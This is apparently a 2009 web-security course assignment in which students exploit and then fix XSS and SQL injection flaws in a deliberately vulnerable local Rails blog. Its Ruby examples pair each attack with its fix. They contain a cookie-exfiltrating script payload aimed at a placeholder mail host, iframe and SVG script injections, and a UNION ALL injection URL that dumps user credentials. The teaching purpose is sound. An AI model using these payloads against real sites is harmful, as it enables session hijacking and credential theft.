CS142: Web Programming and Security

Project 7: Rails Security

Due: Wednesday, February 25, 2009

After spending your youth pillaging and plundering the denizens of the web using your mad skillz, the time has come for you to grow up. It is now time for you to retire from your wild exploits, and redeem yourself in the eyes of the world. You decide to put your skills (yes skills, not skillz) to good use and become an up and coming web security consultant.

Light has offered you a chance to take a step towards redemption by securing his friend's hand-rolled blogging software. Help his friend out: find and fix the XSS and SQL injection vulnerabilities in Simple Blog.

Project Setup

  1. Download the project zip file.
  2. Unzip the file into your desired directory. This will create two directories: proj7 and proj7fix. For Windows, make sure you unzip into InstantRails' rails_apps directory.
  3. In the proj7 directory, type the following:
    rake db:create
    rake db:migrate
  4. Start the application using the following command:
    ruby script/server
    
  5. In your browser, go to http://localhost:3000/. You should see the Simple Blog front page.
  6. In your proj7fix directory, start the application on port 3001 using the following command:
    ruby script/server -p 3001
    
  7. In your browser, go to http://localhost:3001/.
  8. The login is light / password.

proj7 and proj7fix have exactly the same code right now, and they share the same database. You should use the proj7 copy to test that your exploits work. You should put your fixes to the vulnerabilities listed below in proj7fix. Because the two copies share a database, a payload you post through proj7 on port 3000 is also served by proj7fix on port 3001, which is how you can check that the fixed copy renders the same stored payload harmlessly.

Part 1: Simple XSS

  • Find the simple XSS vulnerability. This XSS vulnerability is "simple" because the vulnerable input field has no input filtering whatsoever.
  • Use the XSS vulnerability to e-mail yourself the victim's cookie when the victim is logged in.
  • A link to the e-mail script you should use is on the Simple Blog home page.
  • Put the text you use to exploit the vulnerable field in 1.txt.
  • Fix the vulnerability in Simple Blog in your proj7fix copy.
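The following is an added example, not Simple Blog's code: it reproduces the kind of Rails 2 view that creates a "simple" XSS hole (stored post body printed verbatim) beside the fix, passing the body through the h helper, which in Rails 2 is ERB::Util.html_escape. The e-mail script URL, the view markup and the payload are all constructed here for illustration; the real script link is on the Simple Blog home page.

```ruby
require "erb"

# Rails 2's h helper is ERB::Util.html_escape; including the module here makes
# h available to the templates below without loading Rails.
include ERB::Util

# Placeholder for the e-mail script linked from the Simple Blog home page (assumed URL).
EMAIL_SCRIPT = "http://example.invalid/mail"

# Constructed payload: when a logged-in victim views the post, the browser
# requests EMAIL_SCRIPT with the victim's cookie in the query string.
COOKIE_PAYLOAD = %{<script>new Image().src = "#{EMAIL_SCRIPT}?c=" + encodeURIComponent(document.cookie);</script>}

# Vulnerable view: prints the stored body verbatim, so the script tag survives.
UNSAFE_VIEW = %{<div class="post"><%= body %></div>}
# Fixed view: the body goes through h, so < > & " are turned into entities.
SAFE_VIEW   = %{<div class="post"><%= h body %></div>}

# Render a template with the post body as the only local variable.
def render(view, body)
  ERB.new(view).result(binding)
end

def unsafe_render(body)
  render(UNSAFE_VIEW, body)
end

def safe_render(body)
  render(SAFE_VIEW, body)
end

# True when a <script> element reaches the page, i.e. the payload would run.
def executes_script?(html)
  html.include?("<script>")
end

if __FILE__ == $0
  puts "vulnerable: #{unsafe_render(COOKIE_PAYLOAD)}"
  puts "fixed:      #{safe_render(COOKIE_PAYLOAD)}"
end
```

The fix is one character in the view: every value that came from a user must pass through h (or an equivalent escaping helper) on its way out, regardless of whether it was filtered on its way in.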

Part 2: More Sophisticated XSS

  • Find the harder-to-exploit XSS vulnerability. This XSS vulnerability is harder to exploit because the input field has some input filtering.
  • Exploit the XSS vulnerability using an iframe and then using an embedded image/svg+xml.
    • For the iframe exploit, alert the cookie.
    • For embedded image/svg+xml exploit, simply alert the text "cs142".
    • Read "SVG - XML format for graphics" for more information about SVG documents.
  • Put the text you submit into the vulnerable field in 2iframe.txt and 2embed.txt.
  • Why can't you alert the cookie easily when you exploit the XSS using embed image/svg+xml? Put your answer in 2q.txt.
  • Fix the vulnerabilities by removing customizations in config/environment.rb in your proj7fix copy.
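The following is an added example, not Simple Blog's code, showing why an allowlist filter stops being a defence once iframe or embed are on the list. The page does not say what the customization in config/environment.rb is; this example assumes the usual Rails 2 pattern of widening the sanitize helper's tag list (config.action_view.sanitized_allowed_tags) and uses a toy regex-based sanitizer in place of the real helper. The iframe and embed payloads, and the data: URL used to carry the SVG document, are constructed here.

```ruby
require "erb"

# Toy allowlist sanitizer standing in for Rails 2's sanitize helper: tags not on
# the list are stripped, their text content is kept. The real helper also filters
# attributes and URL protocols; this one does not, it only shows the tag allowlist.
DEFAULT_ALLOWED_TAGS = %w[a b i em strong p br ul ol li code pre blockquote].freeze

# Assumption: the environment.rb customization that Part 2 says to remove widens
# the list, e.g.  config.action_view.sanitized_allowed_tags = 'iframe', 'embed'
CUSTOMIZED_ALLOWED_TAGS = (DEFAULT_ALLOWED_TAGS + %w[iframe embed]).freeze

# Matches an opening or closing tag and captures its name.
TAG_RE = %r{</?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>}

def sanitize(html, allowed_tags = DEFAULT_ALLOWED_TAGS)
  html.gsub(TAG_RE) { allowed_tags.include?($1.downcase) ? $& : "" }
end

# Tag names still present after sanitizing, lowercased and deduplicated.
def remaining_tags(html)
  html.scan(TAG_RE).flatten.map(&:downcase).uniq
end

# Constructed payloads of the two kinds Part 2 asks for.
IFRAME_PAYLOAD = %{<iframe src="javascript:alert(document.cookie)"></iframe>}

# The SVG document travels in a data: URL, so the browser treats it as a separate
# document from the blog page. (One way to build the embed; the page fixes no method.)
SVG_DOC = %{<svg xmlns="http://www.w3.org/2000/svg"><script>alert("cs142")</script></svg>}
EMBED_PAYLOAD = %{<embed type="image/svg+xml" src="data:image/svg+xml,#{ERB::Util.url_encode(SVG_DOC)}">}

if __FILE__ == $0
  [IFRAME_PAYLOAD, EMBED_PAYLOAD].each do |payload|
    puts "default list:    #{sanitize(payload).inspect}"
    puts "customized list: #{sanitize(payload, CUSTOMIZED_ALLOWED_TAGS)}"
  end
end
```

With the default list both payloads are reduced to nothing; with iframe and embed added they pass through untouched, which is why the fix is to delete the customization rather than to add more filtering on top of it.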

Part 3: SQL Injection

  • Find the SQL Injection vulnerability. This SQL injection vulnerability can be exploited by crafting the right URL.
  • Use UNION ALL to list all the usernames and passwords registered in Simple Blog.
  • Even though Firefox will let you get away without URL-encoding the value of the GET parameter, you should encode it; otherwise your URL is not a valid URL under the URL standard. Put the URL-encoded exploit in 3.txt.
  • Fix the SQL Injection vulnerability in Simple Blog.
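The following is an added example, not Simple Blog's code, reproducing outside Rails the two ways Rails 2 lets you build a :conditions clause: string interpolation, which is the injection, and the ? placeholder form, where ActiveRecord quotes each bound value. Simple Blog's vulnerable action, its table and column names and the number of columns in the original SELECT are not shown on the page, so a hypothetical lookup of posts by title against a users(username, password) table is assumed, and the quoting reproduced here is the single-quote doubling that SQLite uses (the MySQL adapter additionally escapes backslashes).

```ruby
require "cgi"
require "erb"

# Vulnerable: the GET parameter is spliced straight into the WHERE clause, as in
#   Post.find(:all, :conditions => "title = '#{params[:title]}'")
def vulnerable_conditions(title)
  "title = '#{title}'"
end

# Quote one value the way ActiveRecord's quote_string does for SQLite:
# wrap in single quotes and double any single quote inside the value.
def quote(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Minimal stand-in for ActiveRecord's sanitize_sql_array: each ? is replaced by
# the next bound value, already quoted.
def sanitize_sql(array)
  sql, *values = array
  sql.gsub("?") { quote(values.shift) }
end

# Fixed: the placeholder form, as in
#   Post.find(:all, :conditions => ["title = ?", params[:title]])
def safe_conditions(title)
  sanitize_sql(["title = ?", title])
end

# Constructed UNION ALL payload. Its SELECT must return as many columns as the
# original query (two are assumed here). The trailing space after -- is deliberate:
# MySQL only treats -- as a comment when whitespace follows it, which is why the
# hint about encoding a trailing space as %20 matters.
PAYLOAD = "x' UNION ALL SELECT username, password FROM users -- "

# Percent-encode the payload into a hypothetical posts URL. ERB::Util.url_encode
# encodes a space as %20 (CGI.escape would use +), so the trailing space survives.
def exploit_url(payload, base = "http://localhost:3000/posts?title=")
  base + ERB::Util.url_encode(payload)
end

# What the server sees after decoding the query string.
def decoded_param(url)
  CGI.unescape(url.split("title=", 2).last)
end

if __FILE__ == $0
  url = exploit_url(PAYLOAD)
  puts url
  puts "vulnerable: WHERE #{vulnerable_conditions(decoded_param(url))}"
  puts "fixed:      WHERE #{safe_conditions(decoded_param(url))}"
end
```

In the vulnerable form the payload closes the string literal, appends its own SELECT and comments out the trailing quote; in the fixed form the whole payload stays inside one quoted literal, so the database compares titles against it and nothing more.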

Additional Requirements, Hints, etc.

  • You must work alone for this project. You may discuss general approaches with other people, and you may ask for help if you get stuck, but you must write your own exploits and fixes.
  • Read the following page about handling SQL injection and XSS in Rails. It contains one slight mistake: the SQL injection vulnerability it describes cannot be used to drop tables, because Rails does not let you submit more than one SQL statement through any ActiveRecord method.
  • You can edit and remove posts in Simple Blog directly through the database.
  • If you cannot find the vulnerabilities mentioned above, you should pay particular attention to the input filtering, or lack thereof, in our code.
  • Firefox trims trailing space off your URL, unless you encode the trailing space using %20.
  • All the fixes are supposed to be very simple. The point is to show you a few ways you might trip up when coding in Rails. If you have a hard time writing fixes, please let us know. You are likely going down the wrong path.

Challenge Problem 1: More Vulnerabilities

We may well have overlooked other web application vulnerabilities, such as XSS, CSRF, or SQL Injection. Please report them to us. We will acknowledge your contribution here and in all future distribution of the project.

Deliverables

Use the standard class submission mechanism to submit a README file and your answers in 1.txt, 2iframe.txt, 2embed.txt, 2q.txt, and 3.txt and your entire proj7fix directory and its descendants, with all the above vulnerabilities patched.

Please indicate in the README file whether you developed on Windows or a Macintosh. We may need this information in order to test your solution. Please also include how much time you spent on each part and how hard it was for you (too easy, easy, good, hard, too hard). Feel free to add any feedback you have on the assignment, and any other things you need to tell us about your assignment that will help us improve it.

Section Materials

Here are the section slides (PPT, PDF).